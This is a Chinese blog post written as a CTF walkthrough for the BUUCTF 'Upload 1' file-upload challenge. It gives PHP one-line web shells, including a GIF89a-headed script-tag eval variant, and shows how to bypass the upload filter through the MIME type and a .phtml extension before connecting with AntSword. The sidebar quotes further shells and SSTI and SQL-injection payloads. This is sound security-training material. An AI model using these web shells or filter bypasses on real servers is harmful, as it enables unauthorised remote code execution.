[极客大挑战 2019]Upload 1

最新推荐文章于 2024-08-14 21:36:35 发布
最新推荐文章于 2024-08-14 21:36:35 发布
阅读量69 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45577185/article/details/117996372
版权

在这里插入图片描述
上传什么都提示:
在这里插入图片描述
提示要上传图片
上传一句话木马:

<?php eval($_POST['b'])?>
<?php $_GET['a']($_POST['b'])?>

抓包,将Content-Type里面的格式改为image/jpeg
在这里插入图片描述
提示:在这里插入图片描述
换个一句话木马:

GIF89a? <script language="php">eval($_REQUEST[1])</script>

在这里插入图片描述
在这里插入图片描述
上传成功
现在需要知道图片的保存路径了。
一般都是upload/filename
访问一下
在这里插入图片描述
在这里插入图片描述
发现有we.txt文件
这样就好办了,拿蚁剑连接吧。
在蚁剑连接的过程中,网页要保持代理状态
密码是1
做到这里,突然发现只有phtml结尾的文件可以用蚁剑连接上
后来发现绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
蚁剑只连接以上的后缀,但是除了phtml其它都被过滤了
连上后:在根目录下面发现了flag
在这里插入图片描述

满月*
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2518
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 932
文件上传冲啊!!!!!!
BUUFCTF—[极客挑战 2019]Upload 1
越努力 越自由
05-12 1151
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 831
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
[极客挑战 2019]Upload
siu~
09-07 1118
[极客挑战 2019]Upload 解题
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 5092
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1994
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
BUUCTF 极客挑战2019 Upload 1
最新发布
2401_82505448的博客
08-14 282
这里我们可以改一下filename为100.phtml,也可以不改。然后我们通过该指令查看一下是否被解析。我们改一下content-type。我们cat一下,得到了flag。我们发现flag就在这里。
极客挑战2019Upload 1:
m0_73673698的博客
06-08 288
发现返回 Not Image所以我们将Content-Type一栏改为image/jpeg,再继续发送发现返回Not php所以我们将filename一项后面的文件后缀由.php改为.phtml继续发送返回。尝试将一句话木马<?> 改为 <%php system($_GET['cmd']);本题首先尝试的一句话木马为<?上传成功但是查看发现一句话木马并未被成功执行。
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 950
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1087
Upload=> 文件上传漏洞。
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 1963
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1306
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
[BJDCTF2020]Easy MD5 1
weixin_45577185的博客
06-24 1126
bp抓包看到: select * from ‘admin’ where password=md5($pass,true) 查看一下md5()函数的true参数 和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到 ffifdyop字符串会造成漏洞 ·在本地环境试验ffifdyop,输出的开头是’or’6xxxxxx 在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1.
[BJDCTF2020]Mark loves cat 1
weixin_45577185的博客
09-06 550
用dirb扫一下,发现源码泄露 dirb http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ 脚本获得源码 python GitHack.py http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach(
[SWPU2019]Web1
weixin_45577185的博客
09-12 519
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值